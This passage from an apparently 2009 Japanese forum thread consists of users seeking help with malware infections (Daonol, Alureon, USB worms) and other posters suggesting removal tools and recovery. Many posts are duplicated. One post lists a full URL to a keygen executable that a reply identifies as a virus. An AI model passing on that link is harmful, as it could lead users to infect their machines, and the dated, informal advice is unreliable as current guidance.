下列から「Report」タブを選択、左下の「Scan」ボタンをクリック
「Select Scan」ダイアログが表示されるので、すべてにチェックを入れて > OK
次にScanするドライブを問われるので、「C:\」にチェックを入れて > OK > ログ抽出走査がスタート(*Scan中は「Files」タブです)
ログ抽出走査が終了すると、
「RootRepeal report 月-日-09 (×-×-×).txt」がメモ帳で開いて、C:にテキストで自動的に保存されています
237 :名無しさん@お腹いっぱい。:2009/10/20(火) 23:07:41
パソコン詳しくないので、
初心者のほうへ書き込んだのですが、
アドバイスがもらえそうもないのでこちらへ来ました
タコウィルスにやられました。
リカバリも出来ません。
ハード買い換えるしかないですか?
初心者のほうへ書き込んだのですが、
アドバイスがもらえそうもないのでこちらへ来ました
タコウィルスにやられました。
リカバリも出来ません。
ハード買い換えるしかないですか?
238 :名無しさん@お腹いっぱい。:2009/10/21(水) 05:40:30
★質問用テンプレ★
【使用OS】 「」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」
【使用OS】 「」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」
239 :234:2009/10/21(水) 15:21:15
>>236
レスありがとうございます。諸事情で遅くなりましたが、昨晩OTLを実行してみました。
Drive not Present or media not loaded
という表示でした。英語だからよく分からないのですが、これは問題ない、ということでしょうか?
また、もう一つのRootRepealはダウンロードしようとしましたが、私のパソコンの
セキュリティソフトに引っ掛かり、危険とのこと。実行して良いか迷い、まだ実行してませんが、
やはり実行したほうが良いでしょうか?
レスありがとうございます。諸事情で遅くなりましたが、昨晩OTLを実行してみました。
Drive not Present or media not loaded
という表示でした。英語だからよく分からないのですが、これは問題ない、ということでしょうか?
また、もう一つのRootRepealはダウンロードしようとしましたが、私のパソコンの
セキュリティソフトに引っ掛かり、危険とのこと。実行して良いか迷い、まだ実行してませんが、
やはり実行したほうが良いでしょうか?
240 :八頭 ◆YAGApwSaEw :2009/10/21(水) 19:39:58
>>234
【使用OS】 「vista」 ← 32bitですか?64bitですか?
support.microsoft.com
コンピュータで実行されている Windows オペレーティング システムが 32 ビット版か 64 ビット版かを確認する方法
http://support.microsoft.com/kb/827218/ja
マカフィーはOTLとRootRepealを誤検出して使えないみたいなので、次の内どれかを選んで下さい
1,higaitaisaku.comのPCトラブル質問掲示板で診てもらう
2.Norton体験版+OTL+RootRepealで駆除する
3.マカフィースレで駆除してもらう
【使用OS】 「vista」 ← 32bitですか?64bitですか?
support.microsoft.com
コンピュータで実行されている Windows オペレーティング システムが 32 ビット版か 64 ビット版かを確認する方法
http://support.microsoft.com/kb/827218/ja
マカフィーはOTLとRootRepealを誤検出して使えないみたいなので、次の内どれかを選んで下さい
1,higaitaisaku.comのPCトラブル質問掲示板で診てもらう
2.Norton体験版+OTL+RootRepealで駆除する
3.マカフィースレで駆除してもらう
241 :234:2009/10/21(水) 20:01:13
>>240
コントロールパネルで確認したら、32bitでした。
ちなみに、昨日ウィルスバスターのオンラインスキャンも実行してみましたが、
何も検出されませんでした。
1,higaitaisaku.comのPCトラブル質問掲示板
なんてものがあったのですね!そちら覗いてみます。
ありがとうございます。
コントロールパネルで確認したら、32bitでした。
ちなみに、昨日ウィルスバスターのオンラインスキャンも実行してみましたが、
何も検出されませんでした。
1,higaitaisaku.comのPCトラブル質問掲示板
なんてものがあったのですね!そちら覗いてみます。
ありがとうございます。
242 :名無しさん@お腹いっぱい。:2009/10/21(水) 21:22:40
セーフモードですら立ち上がらず再起動の繰り返しになったらリカバリーしかないですかね?
その場合中のデータは全て無くなってしまうのでしょうか?
その場合中のデータは全て無くなってしまうのでしょうか?
243 :名無しさん@お腹いっぱい。:2009/10/21(水) 21:28:26
通常はそうです
244 :名無しさん@お腹いっぱい。:2009/10/21(水) 21:34:58
やはりそうですか…。
データ復旧が出来ないのは辛いですね…。店で売ってるような復旧ソフトでも無理ですよね。
データ復旧が出来ないのは辛いですね…。店で売ってるような復旧ソフトでも無理ですよね。
245 : ◆N9P3SuvBPo :2009/10/21(水) 22:10:29
>>244
無駄な足掻きだけど、Windows拡張オプションメニューの項目に
"システム障害時の再起動を無効にする"ってのがありますよね。
それを選んで起動すると、たぶん青色の画面になってそこに英語の文字が出てくると思います。
その表示された英語の文字を教えてくれますか?
無駄な足掻きだけど、Windows拡張オプションメニューの項目に
"システム障害時の再起動を無効にする"ってのがありますよね。
それを選んで起動すると、たぶん青色の画面になってそこに英語の文字が出てくると思います。
その表示された英語の文字を教えてくれますか?
246 :名無しさん@お腹いっぱい。:2009/10/22(木) 00:24:48
ああ付属のシステムリカバリーソフトも紛失したようだ…。
どうしようもないな俺。ちょっと混乱して寝れそうもない。
明日復旧、セキュリティソフト買って無理なら諦めます。
なんか自分の一部が死んだようだ。こんなに自分がPCに依存して生きてたなんて。
ホントに馬鹿だった迂闊だった無防備だった。
似たような環境の友達にも忠告しました。何でもない一日がなんでこんな事に…悪夢だ…。
どうしようもないな俺。ちょっと混乱して寝れそうもない。
明日復旧、セキュリティソフト買って無理なら諦めます。
なんか自分の一部が死んだようだ。こんなに自分がPCに依存して生きてたなんて。
ホントに馬鹿だった迂闊だった無防備だった。
似たような環境の友達にも忠告しました。何でもない一日がなんでこんな事に…悪夢だ…。
247 : ◆N9P3SuvBPo :2009/10/22(木) 00:36:50
>246
リカバリソフトを紛失してもメーカーから取り寄せるっていう手もありますよ。
有料だけど…。
リカバリソフトを紛失してもメーカーから取り寄せるっていう手もありますよ。
有料だけど…。
248 :名無しさん@お腹いっぱい。:2009/10/22(木) 01:32:27
駄目もとで取り寄せてみようか…。
Winnyやマジコンをやってないのを言い訳にしてお情け程度のセキュリティのノーガードで増長してた報いです。
市民プールで我慢しときゃよかったのに泳げないくせに浮輪一つで海で溺れた馬鹿野郎です。
そろそろ落ちついたんで消えます。ありがとう。
Winnyやマジコンをやってないのを言い訳にしてお情け程度のセキュリティのノーガードで増長してた報いです。
市民プールで我慢しときゃよかったのに泳げないくせに浮輪一つで海で溺れた馬鹿野郎です。
そろそろ落ちついたんで消えます。ありがとう。
249 :名無しさん@お腹いっぱい。:2009/10/22(木) 09:10:33
パソコンを起動させたら、デスクトップのショートカットアイコンがほとんどなくなっていました。
またメール(ベッキー)やFFFTPなど各種ソフトの設定がなくなっていました。
ファイルデータは残っていたので、良かったのですが・・・
OSを含めて、すべての設定がなくなっていたり、変更されているという状況です。
これは、ウィルスなのでしょうか?
また元に戻す方法はあるのでしょうか?
ご指導お願いします。
またメール(ベッキー)やFFFTPなど各種ソフトの設定がなくなっていました。
ファイルデータは残っていたので、良かったのですが・・・
OSを含めて、すべての設定がなくなっていたり、変更されているという状況です。
これは、ウィルスなのでしょうか?
また元に戻す方法はあるのでしょうか?
ご指導お願いします。
別スレで回答をもらいましたので、質問を取り下げます。
失礼しました。
失礼しました。
251 :名無しさん@お腹いっぱい。:2009/10/22(木) 11:23:36
【使用OS】 「windousXP」
【Microsoft Update(MU)の状態】 「おそらく最新」
【使用セキュリティソフトとバージョン】 「ウィルスセキュリティ」 「おそらく最新」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「おそらく最新」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」 「スキャンできない状態」
パソコンについて詳しくない初心者です。
昨日の夜、この前GENOウィルスにPCサイトが感染された知り合いのサイトの携帯版の方にアクセスした後、しばらくしてからウィルスセキュリティからなにかのプログラムを許可しますか、という表示が三回に渡り出て、全てをブロックするを選択しました。
今までそんな事はなかったので、携帯サイトの方もGENOに感染していたのかと思いredist.exeを立ち上げる等の簡易確かめをした所普通に立ち上がり、GENOではないのかと思いそれでも動作が弱冠重くなった気がしていたので怖くなって電源を切ろうとしました。
そうすると、電源を切るを押してもまったくパソコンが動かず、間違えてキャンセルを押したのかともう一度スタートから電源を切るを押してしまいました。
しかしやはり全く動かず恐ろしくなって電源ボタンを長押しして強制終了させました。
その後、壊れたのかと気になって何回かつけようとしたのですが
セーフモード
セーフモードとネットワーク
セーフモードとコマンドプロテクト
前回正常起動時の構成(正しく動作した最新の設定)
windowsを通常起動する
の選択肢のある画面が出てきて、通常起動と正常起動時の構成を試してみたところ2つとも画面が真っ暗で矢印アイコンが出ているだけの状態になり、こちらも恐ろしくて強制終了させてしまいました。
初書き込みだったので至らぬ所があったかもしれないです。失礼をしてしまったらすいません。
かなり困っています。できれば解答よろしくお願いします。
【Microsoft Update(MU)の状態】 「おそらく最新」
【使用セキュリティソフトとバージョン】 「ウィルスセキュリティ」 「おそらく最新」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「おそらく最新」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」 「スキャンできない状態」
パソコンについて詳しくない初心者です。
昨日の夜、この前GENOウィルスにPCサイトが感染された知り合いのサイトの携帯版の方にアクセスした後、しばらくしてからウィルスセキュリティからなにかのプログラムを許可しますか、という表示が三回に渡り出て、全てをブロックするを選択しました。
今までそんな事はなかったので、携帯サイトの方もGENOに感染していたのかと思いredist.exeを立ち上げる等の簡易確かめをした所普通に立ち上がり、GENOではないのかと思いそれでも動作が弱冠重くなった気がしていたので怖くなって電源を切ろうとしました。
そうすると、電源を切るを押してもまったくパソコンが動かず、間違えてキャンセルを押したのかともう一度スタートから電源を切るを押してしまいました。
しかしやはり全く動かず恐ろしくなって電源ボタンを長押しして強制終了させました。
その後、壊れたのかと気になって何回かつけようとしたのですが
セーフモード
セーフモードとネットワーク
セーフモードとコマンドプロテクト
前回正常起動時の構成(正しく動作した最新の設定)
windowsを通常起動する
の選択肢のある画面が出てきて、通常起動と正常起動時の構成を試してみたところ2つとも画面が真っ暗で矢印アイコンが出ているだけの状態になり、こちらも恐ろしくて強制終了させてしまいました。
初書き込みだったので至らぬ所があったかもしれないです。失礼をしてしまったらすいません。
かなり困っています。できれば解答よろしくお願いします。
252 :名無しさん@お腹いっぱい。:2009/10/22(木) 11:34:58
何をどうしたいのかよく分からないけど、ウィルスが疑われるならリカバリ(クリーンインストール)するのが確実
253 :名無しさん@お腹いっぱい。:2009/10/22(木) 11:44:51
解答ありがとうございます。
リカバリする場合、パソコンのデータは諦めないといけないでしょうか。
バックアップしたいのですが操作ができずそれもすることができません。
リカバリする場合、パソコンのデータは諦めないといけないでしょうか。
バックアップしたいのですが操作ができずそれもすることができません。
254 :名無しさん@お腹いっぱい。:2009/10/22(木) 14:37:17
知らぬ間に282114というフォルダがあり、
中に道化師というファイルがあった。
全く心当たりないし、ぐぐってもなにもわからない。
これって大丈夫でしょうか?
中に道化師というファイルがあった。
全く心当たりないし、ぐぐってもなにもわからない。
これって大丈夫でしょうか?
255 :名無しさん@お腹いっぱい。:2009/10/23(金) 22:37:46
http://jisaku-sns.info/modules/pukiwiki/attach/5B5B4F70656E504E45A4C7476F6F676C65A5DEA5C3A5D7A4ACBBC8A4A8A4EBA4E8A4A6C0DFC4EAA4B9A4EB5D5D_3036313031353230333430302E6A7067
こんな↑感じの小さいグーグルのログイン画面が消しても消しても出てくる。
これってウィルスですか?
こんな↑感じの小さいグーグルのログイン画面が消しても消しても出てくる。
これってウィルスですか?
256 :名無しさん@お腹いっぱい。:2009/10/24(土) 01:21:41
全国でPCが起動しなくなるトラブルが多発。PC初心者の多い富士通サポセンがパンク状態
http://tsushima.2ch.net/test/read.cgi/news/1256308562/
電話お問い合わせ窓口の混雑について(お詫び) - AzbyClub サポート : 富士通
http://azby.fmworld.net/support/info/apology/20091022.html?supfrom=top_info
コンピュータウイルス「Torojan.Win32/Daonol.H」について | dynabook.com サポート情報
http://dynabook.com/assistpc/info/20091022.htm
コンピュータウイルス「Win32/Daonol」に関するご注意
http://supportapj.dell.com/support/topics/topic.aspx/jp/shared/support/news/2009/20091022?c=jp&l=ja&s=gen
http://tsushima.2ch.net/test/read.cgi/news/1256308562/
電話お問い合わせ窓口の混雑について(お詫び) - AzbyClub サポート : 富士通
http://azby.fmworld.net/support/info/apology/20091022.html?supfrom=top_info
コンピュータウイルス「Torojan.Win32/Daonol.H」について | dynabook.com サポート情報
http://dynabook.com/assistpc/info/20091022.htm
コンピュータウイルス「Win32/Daonol」に関するご注意
http://supportapj.dell.com/support/topics/topic.aspx/jp/shared/support/news/2009/20091022?c=jp&l=ja&s=gen
257 :名無しさん@お腹いっぱい。:2009/11/01(日) 13:42:00
2日前から決まって夜中3時頃にニコニコ動画をみていたら、
急にモニターに「キャー」という音が鳴り、血しぶきが出てきてその血しぶきが広がっていく映像が出てきます。
めちゃくちゃ怖いのですぐに強制終了したのですが、すごく気になります。
タスクマネージャーを調べたり、ウィルススキャンをかけても何もかかりません。
調べたところずいぶん古い現象らしいのですが、それはウィルスの可能性があり、その現象になったら再起動してもHDDがすぐにガリガリいってイカれる。とありました。
ですが、今のところ血しぶき以外なにもパソコンに悪影響は起こっていません。立ち上げも普通にでき、ファイルも特に変わってなく、タスクマネージャーを見ても特に怪しいものはありませんでした。
しかし今日もあの血しぶきがくるのか?と思うとすごく怖くてパソコンをさわりたくなくなります。
どういった対処をすればよいのでしょうか?
ご存知の方が見えましたら教えて下さい。よろしくお願いします。
急にモニターに「キャー」という音が鳴り、血しぶきが出てきてその血しぶきが広がっていく映像が出てきます。
めちゃくちゃ怖いのですぐに強制終了したのですが、すごく気になります。
タスクマネージャーを調べたり、ウィルススキャンをかけても何もかかりません。
調べたところずいぶん古い現象らしいのですが、それはウィルスの可能性があり、その現象になったら再起動してもHDDがすぐにガリガリいってイカれる。とありました。
ですが、今のところ血しぶき以外なにもパソコンに悪影響は起こっていません。立ち上げも普通にでき、ファイルも特に変わってなく、タスクマネージャーを見ても特に怪しいものはありませんでした。
しかし今日もあの血しぶきがくるのか?と思うとすごく怖くてパソコンをさわりたくなくなります。
どういった対処をすればよいのでしょうか?
ご存知の方が見えましたら教えて下さい。よろしくお願いします。
すみません
>>257の補足ですが、自分はニコニコ動画を見ていたのはあまり関係ないのかな、と考えております。
>>257の補足ですが、自分はニコニコ動画を見ていたのはあまり関係ないのかな、と考えております。
259 :名無しさん@お腹いっぱい。:2009/11/02(月) 14:50:08
260 :名無しさん@お腹いっぱい。:2009/11/07(土) 10:01:39
インターネットを見ていると、
なぜかやたらactiveコントロール?の許可を求めるアラートが出ました
特に怪しいサイトは見ていなかったので許可していたのですが、
YouTubeの動画を見ているといきなり画面が真っ暗になり、
スピーカーからは小さなハウリング音が聞こえだして操作不能に
一度電源ボタンで電源を切ってまた入れてみましたが、
ドライブが回りかけるような音だけしてその後なんの変化もありません
そして電源ボタンを長押しすると電源が切れる音はします
他にネット環境がないのでケータイから少し調べてみたのですが、
悪意のあるactiveコントロール?にパソコンを破壊されたのでしょうか?
なぜかやたらactiveコントロール?の許可を求めるアラートが出ました
特に怪しいサイトは見ていなかったので許可していたのですが、
YouTubeの動画を見ているといきなり画面が真っ暗になり、
スピーカーからは小さなハウリング音が聞こえだして操作不能に
一度電源ボタンで電源を切ってまた入れてみましたが、
ドライブが回りかけるような音だけしてその後なんの変化もありません
そして電源ボタンを長押しすると電源が切れる音はします
他にネット環境がないのでケータイから少し調べてみたのですが、
悪意のあるactiveコントロール?にパソコンを破壊されたのでしょうか?
261 :名無しさん@お腹いっぱい。:2009/11/07(土) 14:13:08
262 :名無しさん@お腹いっぱい。:2009/11/07(土) 17:17:37
http://filomediaaidworld.net/Internet.Download.Manager.5.18.Build.3.full.clean.Keygen.45154.exe
これは無害?
これは無害?
263 :名無しさん@お腹いっぱい。:2009/11/07(土) 18:22:11
264 :名無しさん@お腹いっぱい。:2009/11/08(日) 20:29:42
【使用OS】 Windows XP SP3
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 avast!4
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 Spybot(感染後導入・検査)
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 あり
【スキャンの結果何が検出されたか】
ファイル名 C:\WINDOWS\system32\tdlwsp.dll
ウイルス名 Win32:Alureon-DR [Rtk]
先日avastにて以上のマルウェアがルートキットとして発見されました。
その時はチェストに入れたり、削除してみたりしてみたにも関わらず、
常駐保護の、あの怖い効果音と共に出てくる窓が30分おきに現れて困っていました。
そこでSpybotや、SDFixを導入し出てきたマルウェアを駆除し、
Malware byte's Anti-MalwareでAureon系が生成する
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall・・・
というレジストリが検出され削除したところ、
avastで30分おきだった表示が1時間おき位になるという微妙な効果が。
また、Win32:Alureon-DRがルートキットとavastで判断されていたので、
GMERやRootkit Detectiveなどを使ってみたのですが効果なし。そこで調べてみたところ、
Win32/Alureon (データ盗聴型トロイの木馬。ネットワークを経由するデータの
盗聴をおこないユーザ名やパスワード、クレジットカード番号などの
データの盗みだしを可能にする。また影響下にあるマシンへ悪意のあるデータを
送り込むことを可能にするほか、ステルス機能を潜り込ませるためのrootkitとしても機能する)
とありました。これは要するにルートキットなの?それともトロイの木馬?
どうやって駆除すればいいのですか?
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 avast!4
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 Spybot(感染後導入・検査)
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 あり
【スキャンの結果何が検出されたか】
ファイル名 C:\WINDOWS\system32\tdlwsp.dll
ウイルス名 Win32:Alureon-DR [Rtk]
先日avastにて以上のマルウェアがルートキットとして発見されました。
その時はチェストに入れたり、削除してみたりしてみたにも関わらず、
常駐保護の、あの怖い効果音と共に出てくる窓が30分おきに現れて困っていました。
そこでSpybotや、SDFixを導入し出てきたマルウェアを駆除し、
Malware byte's Anti-MalwareでAureon系が生成する
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall・・・
というレジストリが検出され削除したところ、
avastで30分おきだった表示が1時間おき位になるという微妙な効果が。
また、Win32:Alureon-DRがルートキットとavastで判断されていたので、
GMERやRootkit Detectiveなどを使ってみたのですが効果なし。そこで調べてみたところ、
Win32/Alureon (データ盗聴型トロイの木馬。ネットワークを経由するデータの
盗聴をおこないユーザ名やパスワード、クレジットカード番号などの
データの盗みだしを可能にする。また影響下にあるマシンへ悪意のあるデータを
送り込むことを可能にするほか、ステルス機能を潜り込ませるためのrootkitとしても機能する)
とありました。これは要するにルートキットなの?それともトロイの木馬?
どうやって駆除すればいいのですか?
265 :名無しさん@お腹いっぱい。:2009/11/08(日) 20:38:27
とりあえずavastでブートタイム検査。
正直、再インスコした方が早いと思うけどね。
正直、再インスコした方が早いと思うけどね。
266 :名無しさん@お腹いっぱい。:2009/11/08(日) 22:52:01
267 :名無しさん@お腹いっぱい。:2009/11/08(日) 22:54:26
268 :名無しさん@お腹いっぱい。:2009/11/08(日) 23:43:07
269 :名無しさん@お腹いっぱい。:2009/11/09(月) 00:05:26
>>266-267
どうもこうも無いよ...思いっきりウイルスですがな。
ttp://www.virustotal.com/jp/analisis/4f724bd668274cf0376a7b2009286f01fd550e8ac2ba4b6bb2b3a8647b37b9b6-1257692481 (10/40)
あんまり検出率良くねーな。新種か?
どうもこうも無いよ...思いっきりウイルスですがな。
ttp://www.virustotal.com/jp/analisis/4f724bd668274cf0376a7b2009286f01fd550e8ac2ba4b6bb2b3a8647b37b9b6-1257692481 (10/40)
あんまり検出率良くねーな。新種か?
270 :名無しさん@お腹いっぱい。:2009/11/09(月) 00:10:37
"The Fourth Kind" この映画の動画関係はウイルス仕込まれてる所があります。
271 :名無しさん@お腹いっぱい。:2009/11/13(金) 12:12:40
272 :名無しさん@お腹いっぱい。:2009/11/14(土) 03:22:42
質問です。
ネットカフェから利用する場合IPアドレスからどの地域まで特定されるのでしょうか?
IPアドレスからネットカフェの名前まで判断できてしまうんでしょうか?
ネットカフェから利用する場合IPアドレスからどの地域まで特定されるのでしょうか?
IPアドレスからネットカフェの名前まで判断できてしまうんでしょうか?
273 :名無しさん@お腹いっぱい。:2009/11/14(土) 08:50:54
http://www.aguse.jp/
http://www.ipaddresser.com/
http://www.mse.co.jp/ip_domain/
http://whatismyipaddress.com/
IP調べと言ったら、こんなもんですかね
http://www.ipaddresser.com/
http://www.mse.co.jp/ip_domain/
http://whatismyipaddress.com/
IP調べと言ったら、こんなもんですかね
274 :272:2009/11/14(土) 12:11:48
>>273さん
ありがとうございます!
ありがとうございます!
275 :名無しさん@お腹いっぱい。:2009/11/17(火) 08:34:25
ウイルスバスターとは別にオフラインでもウイルスソフトとかちあわず
PCのウイルスを除去するフリーソフトなどはありますか?
今ウイルスセキュリティZERO使ってるんですがどうも調子が悪いような気がします
PCのウイルスを除去するフリーソフトなどはありますか?
今ウイルスセキュリティZERO使ってるんですがどうも調子が悪いような気がします
276 :名無しさん@お腹いっぱい。:2009/11/17(火) 14:41:04
自分で調べろ
277 :名無しさん@お腹いっぱい。:2009/11/18(水) 00:41:43
【使用OS】 「XPsp3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast4.8 home」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「zonealarm」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「無線LANのことでしょうか?使っています」
avastでcドライブをはじめ全体をチェックしたところ
\Documents and Settings\****\Local Setting\Temp\plugtmp-4フォルダ内の
plugin-readme.pdfというファイルがJS:Pdfka-SLというのもに感染していました
とりあえずチェストに移しましたが元のファイル自体何なのかよくわかりませんし
このウイルスも危険かどうか判断できず困っています
どのような対応がベストでしょうか?
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast4.8 home」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「zonealarm」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「無線LANのことでしょうか?使っています」
avastでcドライブをはじめ全体をチェックしたところ
\Documents and Settings\****\Local Setting\Temp\plugtmp-4フォルダ内の
plugin-readme.pdfというファイルがJS:Pdfka-SLというのもに感染していました
とりあえずチェストに移しましたが元のファイル自体何なのかよくわかりませんし
このウイルスも危険かどうか判断できず困っています
どのような対応がベストでしょうか?
278 :名無しさん@お腹いっぱい。:2009/11/18(水) 16:55:21
【使用OS】 「XPsp3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「kingsoftの最新版」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「不明」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「不明」
【ルータの有無】 「有り」
ファイル名 s9h3v.bat
ウイルス名 Win32.hack.NsAnti 105151
他のパソコンで使っていたUSBを別のパソコンにさすと,上記のウイルスを削除したと表示がありました.
このウイルスはどういった悪さをするウイルスなのでしょうか?ググッたところ,出てきませんでした..
Win32.hack.NsAnti まででググると105151の数字部分が異なるウイルスがたくさん表示されたようです.
詳しい方いらっしゃればご解答お願いします.
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「kingsoftの最新版」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「不明」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「不明」
【ルータの有無】 「有り」
ファイル名 s9h3v.bat
ウイルス名 Win32.hack.NsAnti 105151
他のパソコンで使っていたUSBを別のパソコンにさすと,上記のウイルスを削除したと表示がありました.
このウイルスはどういった悪さをするウイルスなのでしょうか?ググッたところ,出てきませんでした..
Win32.hack.NsAnti まででググると105151の数字部分が異なるウイルスがたくさん表示されたようです.
詳しい方いらっしゃればご解答お願いします.
279 :名無しさん@お腹いっぱい。:2009/11/18(水) 17:50:27
【使用OS】 「WindowsXP Home SP2」
【Microsoft Update(MU)の状態】 「SP2で出来る限りは最新」
【使用セキュリティソフトとバージョン】 「ESET SMART SECURITY4」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「常に最新」
【スパイウェア対策ソフト】 「無」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「ウィルスは未検出」
プロセスにIEを起動してないのにiexplore.exeを発見、場所は「C:\RECYCLER\iexplore.exe」
怪しいとおもって調べてみたらどうやらP2P経由で感染する暴露ウィルスの様子
ですが私はWinnyなどのP2Pソフトはやっていないので感染経路が全く不明、いつから感染してるのかも不明・・・
導入しているセキュリティソフトで検査してみたところ何も検出しませんでしたが、しっかりとレジストリは検索した記事通りに書き換えられていました
今のところPCが重くなる等の症状もなく、自分の情報をネットに暴露している様子もないのだけど
これはウィルスではなくただのゴミファイルか何かなのでしょうか
とりあえず怖いのでexeは削除、レジストリも直しておきましたが、非常に心配なので何でも良いので情報提供お願いします
【Microsoft Update(MU)の状態】 「SP2で出来る限りは最新」
【使用セキュリティソフトとバージョン】 「ESET SMART SECURITY4」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「常に最新」
【スパイウェア対策ソフト】 「無」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「ウィルスは未検出」
プロセスにIEを起動してないのにiexplore.exeを発見、場所は「C:\RECYCLER\iexplore.exe」
怪しいとおもって調べてみたらどうやらP2P経由で感染する暴露ウィルスの様子
ですが私はWinnyなどのP2Pソフトはやっていないので感染経路が全く不明、いつから感染してるのかも不明・・・
導入しているセキュリティソフトで検査してみたところ何も検出しませんでしたが、しっかりとレジストリは検索した記事通りに書き換えられていました
今のところPCが重くなる等の症状もなく、自分の情報をネットに暴露している様子もないのだけど
これはウィルスではなくただのゴミファイルか何かなのでしょうか
とりあえず怖いのでexeは削除、レジストリも直しておきましたが、非常に心配なので何でも良いので情報提供お願いします
280 :名無しさん@お腹いっぱい。:2009/11/18(水) 19:26:52
281 :名無しさん@お腹いっぱい。:2009/11/22(日) 19:09:10
>>278
ググルと結構ありますね。
【USBウイルスの捕獲】 [USBメモリに感染するウイルス]
http://royalwin.blog.so-net.ne.jp/2009-07-30
AhnRpta.exe、xvassdf.exeとの闘い。
http://orbit.cocolog-nifty.com/supportdiary/2009/08/ahnrptaexexvass.html
ググルと結構ありますね。
【USBウイルスの捕獲】 [USBメモリに感染するウイルス]
http://royalwin.blog.so-net.ne.jp/2009-07-30
AhnRpta.exe、xvassdf.exeとの闘い。
http://orbit.cocolog-nifty.com/supportdiary/2009/08/ahnrptaexexvass.html
282 :名無しさん@お腹いっぱい。:2009/11/25(水) 14:30:10
ZIPフォルダの中のウィルスのみを削除できるソフトって
ありますか?
ありますか?
283 :名無しさん@お腹いっぱい。:2009/11/25(水) 20:12:32
風邪ひいたんだけどどうすればいい?
284 :名無しさん@お腹いっぱい。:2009/11/26(木) 19:22:23
jword2{1}.cab 気持悪い
285 :名無しさん@お腹いっぱい。:2009/11/26(木) 21:28:37
【使用OS】 Mac OS X Snow Leopard
【Microsoft Update(MU)の状態】 ソフトウェアアップデートは最新
【使用セキュリティソフトとバージョン】 Norton Intenet Security for Mac 最新
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 Yes
【スパイウェア対策ソフト】 None
【スパイウェア対策ソフトの更新は定期的に行なっているか】 No
【ルータの有無】 Yes
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
検出されず。
ストーカー(50代無職w)にクラックされてそいつはもう捕まったんだが、
一段落したのでシステムパーティションをフォーマットした後
クリーンインストールしたのだが、どうも動作がおかしい。
そいつはありとあらゆる嫌がらせのウィルスやトロイを仕込んできたのだが、
例えばよくアクセスする特定のサイトをクッキーをいじってアクセスできなくしたり、
絵描きなので仕事道具のアプリを起動できなくしたりと言ったところ。
本題に移る。当然日常でブラウザを多用するわけだが、
Safariの動作が異常なまでに重い。同じ量のウィンドウとタブを開いても
Firefoxの方が遙かに軽いのだ。Mac ProのXeon x2 8-Coreなのでどう考えてもおかしい。
私が気に掛かっているのは捕まった時、
悪あがきでそいつが「そんなの0を書き込んでインストールすればいい」といっていた事。
フォーマットの際0をn回書き込む消去オプションを選択しなかったのだが、
これが原因でまだウィルスが残っているのではないだろうか?
考えられるタイプはアプリのプライオリティを下げる物ではないかと思う。
どう思う?
【Microsoft Update(MU)の状態】 ソフトウェアアップデートは最新
【使用セキュリティソフトとバージョン】 Norton Intenet Security for Mac 最新
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 Yes
【スパイウェア対策ソフト】 None
【スパイウェア対策ソフトの更新は定期的に行なっているか】 No
【ルータの有無】 Yes
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
検出されず。
ストーカー(50代無職w)にクラックされてそいつはもう捕まったんだが、
一段落したのでシステムパーティションをフォーマットした後
クリーンインストールしたのだが、どうも動作がおかしい。
そいつはありとあらゆる嫌がらせのウィルスやトロイを仕込んできたのだが、
例えばよくアクセスする特定のサイトをクッキーをいじってアクセスできなくしたり、
絵描きなので仕事道具のアプリを起動できなくしたりと言ったところ。
本題に移る。当然日常でブラウザを多用するわけだが、
